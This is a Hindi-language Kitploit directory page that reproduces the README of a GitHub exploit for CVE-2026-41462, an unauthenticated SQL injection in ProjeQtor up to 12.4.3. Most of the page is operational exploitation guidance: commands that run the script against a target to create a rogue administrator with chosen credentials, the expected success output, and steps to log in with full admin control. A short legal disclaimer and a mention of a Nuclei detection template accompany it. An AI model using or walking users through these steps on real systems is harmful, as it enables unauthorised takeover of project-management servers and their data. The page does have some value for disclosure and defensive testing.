Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-41462 — CVE-2026-41462 | Kitploit
उपकरण/GitHubGitHub/0xblackash/cve-2026-41462
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHub0xblackash/cve-2026-41462

CVE-2026-41462

CVE-2026-41462

रिपॉजिटरी देखें
135 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🚨 CVE-2026-41462 - ProjeQtor बिना प्रमाणीकरण SQL इंजेक्शन

projeqtor_cover

ProjeQtor ≤ 12.4.3 में गंभीर बिना प्रमाणीकरण SQL इंजेक्शन

Critical CVSS 9.8 Unauthenticated

📌 अवलोकन

CVE-2026-41462, ProjeQtor प्रोजेक्ट प्रबंधन टूल की लॉगिन कार्यक्षमता में एक गंभीर बिना प्रमाणीकरण SQL इंजेक्शन भेद्यता है।

  • CVE ID: CVE-2026-41462
  • प्रभावित संस्करण: ProjeQtor 7.0 से 12.4.3
  • पैच किया गया संस्करण: 12.4.4
  • गंभीरता: गंभीर (CVSS 9.8)
  • प्रकार: बिना प्रमाणीकरण स्टैक्ड SQL इंजेक्शन

🛠️ शोषण

उपयोग

python3 CVE-2026-41462.py -u http://target.com --create-admin

# With custom credentials
python3 CVE-2026-41462.py -u http://target.com --create-admin \
  --username admin123 --password StrongPass2026!

📊 यदि यह काम करता है तो आप क्या देखेंगे

जब शोषण सफल होता है, तो आपको इसके समान आउटपुट दिखाई देगा:

[+] Targeting: http://target.com
[+] Sending payload to create admin user 'hacker' ...
[+] Request sent successfully.
[+] New admin created → Username: hacker | Password: Admin123!
[+] Try logging in at: http://target.com/login.php

शोषण चलाने के बाद:

  1. अपना ब्राउज़र खोलें और यहाँ जाएं:
    http://target.com/login.php

  2. स्क्रिप्ट आउटपुट में दिखाई गई क्रेडेंशियल्स का उपयोग करके लॉगिन करें।

  3. यदि सफल रहता है, तो आप पूर्ण प्रशासनिक विशेषाधिकारों के साथ ProjeQtor एडमिन डैशबोर्ड पर पहुंच जाएंगे।

सफलता संकेतक:

  • आप सभी प्रोजेक्ट, उपयोगकर्ता और सिस्टम सेटिंग्स देख सकते हैं
  • आप बिना किसी प्रतिबंध के प्रोजेक्ट बना/संपादित/हटा सकते हैं
  • नया उपयोगकर्ता उपयोगकर्ता प्रबंधन अनुभाग में दिखाई देता है

📁 रिपॉजिटरी सामग्री

फ़ाइलविवरण
CVE-2026-41462.pyमुख्य शोषण स्क्रिप्ट
CVE-2026-41462.yamlNuclei डिटेक्शन टेम्पलेट
README.mdयह दस्तावेज़

🚀 त्वरित प्रारंभ

  1. रिपॉजिटरी क्लोन करें:

    git clone https://github.com/0xBlackash/CVE-2026-41462.git
    cd CVE-2026-41462
    
  2. शोषण चलाएं:

    python3 CVE-2026-41462.py -u http://target.com --create-admin
    
  3. नव निर्मित एडमिन खाते से लॉगिन करें।


⚠️ अस्वीकरण

यह टूल केवल शैक्षिक उद्देश्यों और अधिकृत पेनेट्रेशन टेस्टिंग के लिए है। अनधिकृत उपयोग अवैध है।


📄 संदर्भ

  • NVD - CVE-2026-41462
  • आधिकारिक ProjeQtor पैच (v12.4.4+)

जिम्मेदार प्रकटीकरण • केवल नैतिक हैकिंग
सुरक्षित रहें। कानूनी रूप से परीक्षण करें।
टूल डाउनलोड करें